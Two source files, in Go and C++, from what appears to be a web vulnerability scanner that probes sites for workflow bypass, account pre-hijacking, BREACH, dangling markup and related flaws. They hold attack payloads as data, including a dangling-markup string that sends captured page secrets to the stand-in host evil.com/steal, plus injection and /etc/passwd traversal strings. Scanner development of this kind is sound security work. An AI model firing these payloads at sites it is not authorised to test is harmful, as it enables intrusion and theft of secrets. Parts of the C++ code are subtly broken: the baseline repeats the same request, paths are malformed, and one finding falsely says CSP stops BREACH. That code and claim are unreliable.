File: pkg/scanner/advanced_auth.go
package scanner

import (
	"fmt"
	"strings"
	"sync"
	"time"

	"github.com/zanicool/apex-cli/pkg/crawler"
	"github.com/zanicool/apex-cli/pkg/engine"
	"github.com/zanicool/apex-cli/pkg/oob"
)

func scanTokenRaceCondition(cfg *engine.Config, http *engine.HTTPClient, crawl *crawler.Result, _ *oob.Client) []Finding {
	var findings []Finding
	// Race condition on token generation/refresh
	tokenPaths := []string{"/api/token/refresh", "/oauth/token", "/api/auth/refresh", "/token"}
	if len(crawl.Pages) == 0 {
		return findings
	}
	baseURL := strings.Split(crawl.Pages[0].URL, "/")[0] + "//" + strings.Split(crawl.Pages[0].URL, "/")[2]
	for _, path := range tokenPaths {
		url := baseURL + path
		var wg sync.WaitGroup
		var mu sync.Mutex
		tokens := make(map[string]bool)
		for i := 0; i < 10; i++ {
			wg.Add(1)
			go func() {
				defer wg.Done()
				resp := http.Post(url, "application/json", `{"refresh_token":"test"}`)
				if resp.Err == nil && resp.StatusCode == 200 && strings.Contains(resp.Body, "token") {
					mu.Lock()
					tokens[resp.Body[:min(50, len(resp.Body))]] = true
					mu.Unlock()
				}
			}()
		}
		wg.Wait()
		if len(tokens) > 1 {
			findings = append(findings, Finding{Type: "Token Race Condition", Severity: "high", URL: url, Detail: fmt.Sprintf("Parallel token requests returned %d different tokens — race condition on token generation", len(tokens)), Template: "apex-token-race"})
		}
	}
	return findings
}

func scanWorkflowBypass(cfg *engine.Config, http *engine.HTTPClient, crawl *crawler.Result, _ *oob.Client) []Finding {
	var findings []Finding
	// Skip steps in multi-step workflows
	stepPaths := []struct{ skip, final string }{
		{"/checkout/step1", "/checkout/step3"},
		{"/register/verify", "/register/complete"},
		{"/payment/init", "/payment/confirm"},
		{"/onboarding/step1", "/onboarding/complete"},
	}
	if len(crawl.Pages) == 0 {
		return findings
	}
	baseURL := strings.Split(crawl.Pages[0].URL, "/")[0] + "//" + strings.Split(crawl.Pages[0].URL, "/")[2]
	for _, step := range stepPaths {
		resp := http.Get(baseURL + step.final)
		if resp.Err == nil && resp.StatusCode == 200 && len(resp.Body) > 100 && !strings.Contains(strings.ToLower(resp.Body), "redirect") && !strings.Contains(strings.ToLower(resp.Body), "unauthorized") {
			findings = append(findings, Finding{Type: "Workflow Step Bypass", Severity: "high", URL: baseURL + step.final, Detail: fmt.Sprintf("Final step accessible without completing %s", step.skip), Template: "apex-workflow-bypass"})
		}
	}
	return findings
}

func scanAccountPrehijacking(cfg *engine.Config, http *engine.HTTPClient, crawl *crawler.Result, _ *oob.Client) []Finding {
	var findings []Finding
	// Pre-hijacking: register with victim's email before they do
	registerPaths := []string{"/register", "/signup", "/api/register", "/api/auth/register"}
	if len(crawl.Pages) == 0 {
		return findings
	}
	baseURL := strings.Split(crawl.Pages[0].URL, "/")[0] + "//" + strings.Split(crawl.Pages[0].URL, "/")[2]
	for _, path := range registerPaths {
		url := baseURL + path
		// Check if registration requires email verification
		resp := http.Post(url, "application/json", `{"email":"prehijack@test.com","password":"Test123!"}`)
		if resp.Err == nil && resp.StatusCode == 200 && !strings.Contains(strings.ToLower(resp.Body), "verify") && !strings.Contains(strings.ToLower(resp.Body), "confirm") {
			findings = append(findings, Finding{Type: "Account Pre-Hijacking Risk", Severity: "medium", URL: url, Detail: "Registration succeeds without email verification — attacker can pre-register victim's email", Template: "apex-prehijack"})
		}
	}
	return findings
}

func scanServerTimingOracle(cfg *engine.Config, http *engine.HTTPClient, crawl *crawler.Result, _ *oob.Client) []Finding {
	var findings []Finding
	for _, page := range crawl.Pages[:min(5, len(crawl.Pages))] {
		resp := http.Get(page.URL)
		if resp.Err != nil {
			continue
		}
		timing := resp.Headers.Get("Server-Timing")
		if timing != "" && (strings.Contains(timing, "db") || strings.Contains(timing, "cache") || strings.Contains(timing, "app")) {
			findings = append(findings, Finding{Type: "Server-Timing Header Leaks Internal Metrics", Severity: "low", URL: page.URL, Detail: "Server-Timing: " + timing, Template: "apex-server-timing"})
		}
	}
	return findings
}

func scanCompressionOracle(cfg *engine.Config, http *engine.HTTPClient, crawl *crawler.Result, _ *oob.Client) []Finding {
	var findings []Finding
	// BREACH-style: check if responses are compressed and reflect user input
	for _, page := range crawl.Pages[:min(5, len(crawl.Pages))] {
		resp := http.Get(page.URL)
		if resp.Err != nil {
			continue
		}
		encoding := resp.Headers.Get("Content-Encoding")
		if (encoding == "gzip" || encoding == "br" || encoding == "deflate") && strings.Contains(resp.Body, "csrf") {
			findings = append(findings, Finding{Type: "BREACH/Compression Oracle Risk", Severity: "low", URL: page.URL, Detail: fmt.Sprintf("Response compressed (%s) and contains secrets (CSRF token) — BREACH attack possible", encoding), Template: "apex-breach"})
			break
		}
	}
	return findings
}

func scanDanglingMarkup(cfg *engine.Config, http *engine.HTTPClient, crawl *crawler.Result, _ *oob.Client) []Finding {
	var findings []Finding
	payload := `"><img src='https://evil.com/steal?`
	for u, params := range crawl.Params {
		for _, p := range params {
			testURL := injectParam(u, p, payload)
			resp := http.Get(testURL)
			if resp.Err == nil && strings.Contains(resp.Body, "evil.com/steal?") {
				// Check if subsequent content is captured in the src attribute
				idx := strings.Index(resp.Body, "evil.com/steal?")
				if idx > 0 && idx+50 < len(resp.Body) {
					captured := resp.Body[idx : idx+min(100, len(resp.Body)-idx)]
					if strings.Contains(captured, "token") || strings.Contains(captured, "csrf") || strings.Contains(captured, "session") {
						findings = append(findings, Finding{Type: "Dangling Markup Injection — Secret Capture", Severity: "high", URL: testURL, Param: p, Detail: "Injected markup captures subsequent page content including secrets", Template: "apex-dangling-markup"})
					}
				}
			}
		}
	}
	return findings
}

func scanEtagTracking(cfg *engine.Config, http *engine.HTTPClient, crawl *crawler.Result, _ *oob.Client) []Finding {
	var findings []Finding
	if len(crawl.Pages) == 0 {
		return findings
	}
	resp := http.Get(crawl.Pages[0].URL)
	if resp.Err != nil {
		return findings
	}
	etag := resp.Headers.Get("ETag")
	if etag != "" && len(etag) > 20 {
		findings = append(findings, Finding{Type: "ETag Tracking — Unique Identifier", Severity: "info", URL: crawl.Pages[0].URL, Detail: "Long ETag may be used for user tracking: " + etag, Template: "apex-etag"})
	}
	return findings
}

func scanMutationFuzzer(cfg *engine.Config, http *engine.HTTPClient, crawl *crawler.Result, _ *oob.Client) []Finding {
	var findings []Finding
	// Smart fuzzer: mutate existing parameter values
	mutations := []struct{ suffix, detect string }{
		{"{{7*7}}", "49"},
		{"${7*7}", "49"},
		{"<svg onload=alert(1)>", "onload=alert"},
		{"' OR '1'='1", "sql"},
		{"%0d%0aInjected:true", ""},
		{"../../../etc/passwd", "root:"},
	}
	for u, params := range crawl.Params {
		for _, p := range params {
			for _, m := range mutations {
				testURL := injectParam(u, p, m.suffix)
				resp := http.Get(testURL)
				if resp.Err == nil && m.detect != "" && strings.Contains(strings.ToLower(resp.Body), m.detect) {
					findings = append(findings, Finding{Type: "Mutation Fuzzer Hit", Severity: "high", URL: testURL, Param: p, Payload: m.suffix, Evidence: m.detect, Template: "apex-mutation-fuzz"})
					break
				}
				if resp.Err == nil && resp.Duration > 3*time.Second {
					findings = append(findings, Finding{Type: "Mutation Fuzzer — Time Delay", Severity: "medium", URL: testURL, Param: p, Payload: m.suffix, Detail: fmt.Sprintf("%.1fs delay", resp.Duration.Seconds()), Template: "apex-mutation-time"})
					break
				}
			}
		}
	}
	return findings
}

File: src/scanners/advanced_auth.cpp
/// @file scanners/advanced_auth.cpp
/// @brief Advanced auth scanners: workflow bypass, account pre-hijacking,
///        compression oracle, dangling markup, etag tracking, mutation fuzzer.
/// FP reduction: every scanner now captures a baseline response before
/// injecting payloads and validates findings against it.
#include <chrono>
#include <set>

#include "scanner_base.hpp"
#include "../response_validator.hpp"

namespace apex {
namespace {

/// Scanner implementation.
/// @brief Scan for workflow_bypass vulnerabilities.
std::vector<Finding> scan_workflow_bypass(const Config&, HttpClient& http, const CrawlResult& crawl) {
  std::vector<Finding> findings;
  if (crawl.urls.empty()) return findings;
  std::string base = base_url_from(crawl.urls[0]);

  struct Step {
    const char* skip;
    const char* final_;
  };
  const Step steps[] = {
      {"/checkout/step1", "/checkout/step3"},
      {"register/verify", "/register/complete"},
      {"payment/init", "/payment/confirm"},
      {"onboarding/step1", "/onboarding/complete"},
  };

  for (const auto& s : steps) {
    // Baseline: what does the final step look like normally?
    auto baseline = http.get(base + s.final_);
    if (!is_real_api_response(baseline)) continue;

    auto resp = http.get(base + s.final_);
    if (resp.status_code == 200 && is_real_api_response(resp) &&
        resp.body.find("redirect") == std::string::npos &&
        resp.body.find("unauthorized") == std::string::npos) {

      // Require a meaningful difference from baseline, not just any response.
      if (responses_differ(resp, baseline, 50)) {
        findings.push_back(
            {"Workflow Step Bypass", "high", base + s.final_,
             "Final step accessible without completing " + std::string(s.skip), "", "",
             "diff:" + std::to_string(resp.body.size()) + "/base:" + std::to_string(baseline.body.size())});
      }
    }
  }
  return findings;
}

/// Scanner implementation.
/// @brief Scan for account_prehijack vulnerabilities.
std::vector<Finding> scan_account_prehijack(const Config&, HttpClient& http, const CrawlResult& crawl) {
  std::vector<Finding> findings;
  if (crawl.urls.empty()) return findings;
  std::string base = base_url_from(crawl.urls[0]);

  const std::vector<std::string> paths = {"/register", "/signup", "/api/register", "/api/auth/register"};

  for (const auto& path : paths) {
    // Baseline: what does the normal registration page look like?
    auto baseline = http.get(base + path);
    if (!is_real_api_response(baseline)) continue;

    auto resp = http.post(base + path, R"({"email":"prehijack@test.com","password":"Test123!"})", "application/json");
    if (resp.status_code == 200 && is_real_api_response(resp) &&
        !has_baseline_diff_indicator(resp.body, baseline.body, "verify") &&
        !has_baseline_diff_indicator(resp.body, baseline.body, "confirm")) {

      // Only report if response differs from normal registration page.
      if (has_size_diff(resp.body, baseline.body, 30)) {
        findings.push_back(
            {"Account Pre-Hijacking Risk", "medium", base + path,
             "Registration succeeds without email verification", "", "",
             "diff:" + std::to_string(resp.body.size()) + "/base:" + std::to_string(baseline.body.size())});
      }
    }
  }
  return findings;
}

/// Scanner implementation.
/// @brief Scan for server_timing vulnerabilities.
std::vector<Finding> scan_server_timing(const Config&, HttpClient& http, const CrawlResult& crawl) {
  std::vector<Finding> findings;
  size_t limit = std::min(crawl.urls.size(), size_t(5));
  for (size_t i = 0; i < limit; ++i) {
    auto resp = http.get(crawl.urls[i]);
    auto it = resp.headers.find("Server-Timing");
    if (it != resp.headers.end() && (it->second.find("db") != std::string::npos ||
                                     it->second.find("cache") != std::string::npos ||
                                     it->second.find("app") != std::string::npos)) {
      findings.push_back({"Server-Timing Header Leaks Internal Metrics", "low", crawl.urls[i],
                          "Server-Timing: " + it->second, "", "", ""});
    }
  }
  return findings;
}

/// Scanner implementation.
/// @brief Scan for compression_oracle vulnerabilities.
std::vector<Finding> scan_compression_oracle(const Config&, HttpClient& http, const CrawlResult& crawl) {
  std::vector<Finding> findings;
  size_t limit = std::min(crawl.urls.size(), size_t(5));
  for (size_t i = 0; i < limit; ++i) {
    auto resp = http.get(crawl.urls[i]);
    auto it = resp.headers.find("Content-Encoding");

    // Only flag if compression is present AND CSRF token would be exposed.
    bool compressed = it != resp.headers.end() && (it->second == "gzip" || it->second == "br" || it->second == "deflate");
    if (!compressed) continue;

    // Check for presence of secret-like tokens that compression could leak.
    std::vector<std::string> secrets = {"csrf", "xsrf", "_token=", "authenticity"};
    if (has_baseline_diff_any(resp.body, resp.body, secrets)) {
      findings.push_back({"BREACH/Compression Oracle Risk", "low", crawl.urls[i],
                          "Response compressed (" + it->second + ") and contains CSRF token — verify CSP headers protect against BREACH", "", "",
                          "encoding:" + std::string(it->second)});
    }
  }
  return findings;
}

/// Scanner implementation.
/// @brief Scan for dangling_markup vulnerabilities.
std::vector<Finding> scan_dangling_markup(const Config&, HttpClient& http, const CrawlResult& crawl) {
  std::vector<Finding> findings;
  // Use a unique marker unlikely to appear naturally.
  std::string payload = R"("><img src='https://evil.com/steal?)";

  for (const auto& url : crawl.urls) {
    auto baseline = http.get(url);
    if (!is_real_api_response(baseline)) continue;

    // If the marker already exists in baseline, skip — not an injection point.
    if (baseline.body.find("evil.com/steal?") != std::string::npos) continue;

    auto targets = get_targets(crawl, url);
    for (const auto& [base, param] : targets) {
      auto resp = http.get(base + payload);
      // Confirm our input is reflected and differs from baseline.
      if (resp.body.find("evil.com/steal?") != std::string::npos &&
          has_baseline_diff_indicator(resp.body, baseline.body, "evil.com/steal?")) {

        findings.push_back({"Dangling Markup Injection", "high", base + payload,
                            "Injected markup reflected and absent from baseline", param, payload,
                            "reflected:" + std::to_string(resp.body.find("evil.com/steal?"))});
      }
    }
  }
  return findings;
}

/// Scanner implementation.
/// @brief Scan for etag_tracking vulnerabilities.
std::vector<Finding> scan_etag_tracking(const Config&, HttpClient& http, const CrawlResult& crawl) {
  std::vector<Finding> findings;
  if (crawl.urls.empty()) return findings;
  auto resp = http.get(crawl.urls[0]);
  auto it = resp.headers.find("ETag");

  // Only flag ETags that are long enough to be user-specific (not hash of content version).
  // Standard HTTP ETags like "abc123" or MD5 hashes (~32 chars) are normal.
  if (it != resp.headers.end() && it->second.size() > 64) {
    findings.push_back({"ETag Tracking", "info", crawl.urls[0],
                        "Long ETag may be used for user tracking: " + it->second, "", "", ""});
  }
  return findings;
}

/// Scanner implementation.
/// @brief Scan for mutation_fuzzer vulnerabilities.
std::vector<Finding> scan_mutation_fuzzer(const Config&, HttpClient& http, const CrawlResult& crawl) {
  std::vector<Finding> findings;
  struct Mutation {
    const char* suffix;
    const char* detect;
  };
  const Mutation mutations[] = {
      {"{{7*7}}", "49"},
      {"${7*7}", "49"},
      {"<svg onload=alert(1)>", "onload=alert"},
      {"' OR '1'='1", "sql"},
      {"../../../etc/passwd", "root:"},
  };

  for (const auto& url : crawl.urls) {
    // Baseline: capture normal response before any mutation.
    auto baseline = http.get(url);
    if (!is_real_api_response(baseline)) continue;

    auto targets = get_targets(crawl, url);
    for (const auto& [base, param] : targets) {
      for (const auto& m : mutations) {
        // Skip payloads whose detection string already appears in baseline.
        if (baseline.body.find(m.detect) != std::string::npos) continue;

        auto resp = http.get(base + m.suffix);
        // Only report if indicator appears AFTER injection AND was absent from baseline.
        if (has_baseline_diff_indicator(resp.body, baseline.body, m.detect)) {
          findings.push_back({"Mutation Fuzzer Hit", "high", base + m.suffix,
                              std::string("Payload '") + m.suffix + "' triggered detection (" + m.detect + "')",
                              param, m.suffix, m.detect});
        }
      }
    }
  }
  return findings;
}

}  // namespace

std::vector<Scanner> register_advanced_auth_scanners() {
  return {
      {"Workflow Bypass", scan_workflow_bypass},
      {"Account Pre-Hijack", scan_account_prehijack},
      {"Server-Timing Leak", scan_server_timing},
      {"Compression Oracle", scan_compression_oracle},
      {"Dangling Markup", scan_dangling_markup},
      {"ETag Tracking", scan_etag_tracking},
      {"Mutation Fuzzer", scan_mutation_fuzzer},
  };
}

}  // namespace apex
